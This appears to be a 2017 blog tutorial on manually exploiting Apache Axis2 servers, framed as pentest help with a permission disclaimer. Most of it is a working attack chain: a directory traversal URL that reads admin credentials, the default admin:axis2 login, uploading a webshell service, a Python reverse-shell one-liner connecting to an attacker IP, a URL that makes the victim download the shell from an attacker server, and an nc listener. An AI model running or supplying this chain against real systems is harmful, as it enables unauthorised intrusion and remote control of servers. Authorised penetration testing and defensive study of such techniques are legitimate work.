Thursday, March 9, 2017

Manually Exploiting Apache Axis2

Disclaimer:

I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.

Prerequisites

For this exploit to work you must have:
  1. Valid admin console credentials
    • Default = admin:axis2
  2. Public access to the admin console
    • https://victim.com/axis2/axis2-admin

Discovery

There are a couple of ways to potentially find credentials for Axis2 servers. Some of these include: default credentials, weak credentials that can be brute forced, or outdated Axis2 servers. We will use a vulnerability in Apache Axis2 <= v1.4.1 to discover the necessary credentials. This vulnerability is a directory traversal that gives read access to the configuration file. This can be discovered using modules in Nmap and OpenVAS.

Nmap


$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2

OpenVAS

FYI

  • There is a Metasploit module at "exploit/multi/http/axis2_deployer" that will attempt to "Autopwn" the server.
  • The code can be found at Github.
  • I have tried this exploit multiple times with no success.

Manual Validation

  1.  Navigating to https://victim.com/axis2/services/Version?xsd=../conf/axis2.xml will allow us to get the credentials. They should look like this:
  2. <parameter name="userName">admin</parameter> 
    <parameter name="password">axis2</parameter>
    
  3. When you navigate to https://victim.com/axis2/axis2-admin/ it should give you the login portal.

Create the Payload

A simple Axis2 webshell can be found at https://github.com/CaledoniaProject/AxisInvoker
  1. Download the file
  2. Compile the file
    • Modify $JAVA_HOME if necessary
    • "ant -v" to build

Exploit

  1. Upload the AxisInvoker.aar service.
  2. Verify the deployment by checking the Deactivate or Activate service tab.
  3. Verify the shell works by running https://victim.com/axis2/services/AxisInvoker/exec?cmd=id
  4. Since stable shells are superior to web shells, we will improve to a stable shell. You will need to find what languages are on the system or use a system native option (like nc).
    • Get a shell and modify it to your host machine.
      • I usually get most of my shells from PentestMonkey
      • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);
        
    • Download your reverse shell from your webserver to the victim machine.
      • https://victim.com/axis2/services/AxisInvoker/download?url=http://<AttackerIP>/shell.py&file=shell.py
    • Listen for the reverse shell by running "nc -nlvp 443".
    • Execute your shell on the victim machine.
      • https://victom.com/axis2/services/AxisInvoker/exec?cmd=python%20test.py
    • After a few seconds, you should have a shell on your listener!

Hope that helps in your future pentests!